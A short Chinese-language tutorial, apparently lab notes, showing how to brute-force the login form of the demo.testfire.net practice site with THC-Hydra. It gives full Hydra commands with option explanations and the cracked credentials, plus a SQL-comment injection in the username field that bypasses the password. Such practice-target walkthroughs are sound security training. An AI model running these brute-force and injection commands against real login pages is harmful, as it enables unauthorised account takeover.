使用瀏覽器查找該網頁原始碼

先找form > 帳號欄位為uid > 密碼欄位為passw > 使用post傳給doLogin

破解

cd C:\Users\user\Downloads\thc-hydra-windows-v8.5

移到hydra目錄下

hydra -L user.lst -P password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

-L > 指定帳號字典檔
-l > 指定一個帳號
-P > 指定密碼字典檔
-p > 指定一個密碼
http-post-form > 服務模組
/doLogin > 驗證網址
： > 分隔
uid=^USER^&passw=^PASS^&btnSubmit=Login > 要傳送給驗證網址的資料
Login Failed > 判斷準則
C=/login.jsp > 指定在傳送資料前，先向網址取得Cookie資訊
login:admin password:admin > 破解的第一組帳號密碼
login:jsmith password:demo1234 > 破解的第二組帳號密碼

密碼固定，破解帳號

hydra -L user.lst -p 1234 demo.testfire.net http-post-form "/doLogin:uid=^USER^' --&passw=1234:Login Failed:C=/login.jsp"

固定密碼為1234 > 破解帳號
login:admin password:1234 > 破解的第一組帳號
login:jsmith password:1234 > 破解的第二組帳號